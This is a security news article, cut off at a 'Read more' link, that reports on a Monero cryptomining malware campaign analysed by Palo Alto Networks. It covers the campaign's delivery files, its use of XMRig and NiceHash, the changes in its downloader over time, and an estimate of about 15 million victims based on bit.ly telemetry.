A single Monero cryptocurrency mining operation has used malware delivery techniques to affect at least 15 million people worldwide.

The campaign, which has been active since at least October 2017, delivers its payload using one of 250 unique Microsoft Preinstallation Environment (PE) files like “File4org]_421064.exe” and “[Dropmefiles]_420549.exe.” The files appear to come from popular file-sharing services. They all ultimately download a piece of malware detected by Malwarebytes as “trojan.bitcoinMiner.”

This campaign’s malicious payload uses NiceHash, a hashing processing power marketplace which temporarily ceased operations in December 2017 following a security breach. The trojan also uses a cryptominer known as XMRig to mine for Monero. All at the expense of an infected computer’s CPU.

Those behind this operation have updated the malware’s behavior at least four times. Up until 20 October 2017, the payload dropped a VBS file (and LNK file for persistence). The VBS file, in turn, used the BITSAdmin tool to download scrips and XMRig from a remote location.

Execution workflow for the oldest malware encountered in this campaign. (Source: Palo Alto Networks)

Things changed after 20 October 2017 when the initial VBS file dispensed with BITSAdmin and began using HTTP redirection services like bit.ly. Through this link shortener in particular, Josh Grunzweig has come up with an estimate of how many people this campaign has likely affected:

Based on publicly available telemetry data via bitly, we are able to estimate that the number of victims affected by this operation is roughly around 15 million people worldwide. This same telemetry provides insights into the most heavily targeted areas involving this campaign, which impacts southeast Asia, northern Africa, and South America the most.

However, it’s important to note that the actual number of victims is likely much higher because less than half of the (Read more...)